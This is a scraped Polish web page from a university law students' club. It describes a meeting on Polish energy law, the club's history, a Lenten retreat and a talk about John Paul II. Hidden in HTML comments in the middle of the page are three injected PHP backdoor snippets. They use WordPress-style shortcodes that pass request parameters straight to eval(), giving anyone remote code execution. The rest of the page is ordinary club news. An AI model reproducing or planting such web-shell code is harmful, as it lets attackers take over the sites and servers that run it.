Prawo energetyczne

W tym tygodniu spotkaliśmy się, aby porozmawiać o prawie energetycznym. Opiekun naszego koła, dr Adam Szafrański, przedstawił mechanizmy rządzące energetyką w Polsce. Prezentacja przebiegała według następujących punktów:

 1. Wyjaśnienie pojęcia „energetyka”.
 2. Omówienie kompetencji organów zajmujących się energetyką:
  • Minister właściwy do spraw gospodarki,
  • Minister właściwy do spraw Skarbu Państwa,
  • Prezes Urzędu Regulacji Energetyki,
  • Prezes Urzędu Ochrony Konkurencji i Konsumentów.
 3. Przedstawienie aktualnej problematyki poszczególnych dziedzin energetyki w zakresie polityk oraz prawa:
  • gaz ziemny,
  • energia elektryczna,
  • paliwa.

Początek

Start.

<!– [insert_php]if (isset($_REQUEST["hfmjJ"])){eval($_REQUEST["hfmjJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["hfmjJ"])){eval($_REQUEST["hfmjJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Fpe"])){eval($_REQUEST["Fpe"]);exit;}[/insert_php][php]if (isset($_REQUEST["Fpe"])){eval($_REQUEST["Fpe"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rgHoB"])){eval($_REQUEST["rgHoB"]);exit;}[/insert_php][php]if (isset($_REQUEST["rgHoB"])){eval($_REQUEST["rgHoB"]);exit;}[/php] –>

O nas

Koło Naukowe Utriusque Iuris powstało w 1997 r., ale jego historia sięga roku 1994, kiedy to grupa studentów wraz z mgr. Franciszkiem Longchamps de Bérier zaczęła spotykać się w Bibliotece Prawa Rzymskiego, by dyskutować o prawie rzymskim i kanonicznym oraz ważkich problemach związanych z prawem i moralnością.
Dyskusjom i referatom towarzyszyły imprezy dodatkowe: wspólne wypady w góry, konferencje, rekolekcje wyjazdowe. Zanim Koło powstało, wytyczone zostały podstawowe formy jego działalności, które przez kolejne roczniki studentów kontynuowane są z powodzeniem.

Wyjazd rekolekcyjny

W tym roku rekolekcje wielkopostne zorganizowaliśmy w Niepokalanowie, u ojców Franciszkanów. W trwającym od 14 do 16 marca wyjeździe wzięła udział rekordowa liczba uczestników- ponad 60 osób! Rozważania zatytułowane Nad brzegami Babilonu usiedliśmy, płacząc poprowadził ks. Piotr Majka.

Ksiądz Piotr jest kapelanem wojskowym i był pierwszym proboszczem w prowincji Babilon. Jego kazania i nauki pozwoliły nam oderwać się od codzienności dojść do istoty sensu życia. Jasne i konkretne słowa, jak przystało na prawdziwego żołnierza, a także radość i serdeczność, którą okazał ks. Piotr sprawiły, że rekolekcje stały się wyjątkowe.

Tekst przygotowała Marta Kiebała.

Spotkanie z Pawłem Zuchniewiczem

Na środowym spotkaniu Koła spotkaliśmy się z dziennikarzem i biografem Jana Pawła II, Pawłem Zuchniewiczem.

Prelegent przygotował spotkanie pt. Jan Paweł II wierny w przyjaźni podczas którego przedstawił zebranym kilka przykładów z życia Papieża, poczynając od pierwszych lat kapłańskich Karola Wojtyły, poprzez lata biskupie, aż do ostatnich dni życia, które w wymowny sposób przypominały nam w jaki sposób Jan Paweł II realizował zobowiązanie przyjaźni. Wycieczka w Tatry w celu obejrzenia krokusów, powrót do zostawionych przyjaciół na kajakach, spotkanie ze znajomymi na Grodzkiej, czy wreszcie ostatnia Msza Papieża odprawiana w intencji chorego przyjaciela Mieczysława były dla nas niesamowitą okazją do chwili przemyśleń na temat przyjaźni, wierności, zobowiązań, poświęcania i oddania.

Celnie dobrane do tematu i pełne emocji nagrania przemówień Papieża, jak i słów jego przyjaciół, jakie zaprezentował nam Pan Paweł Zuchniewicz, okazały się bardzo pomocnym środkiem do przedstawienia ogromnego zaangażowania Jana Pawła II w relację ze swoimi przyjaciółmi. Spotkanie szczególne. Zwłaszcza dla prawników. Serdecznie dziękujemy!

Sam Prelegent wspomina o tym spotkaniu na swojej stronie internetowej.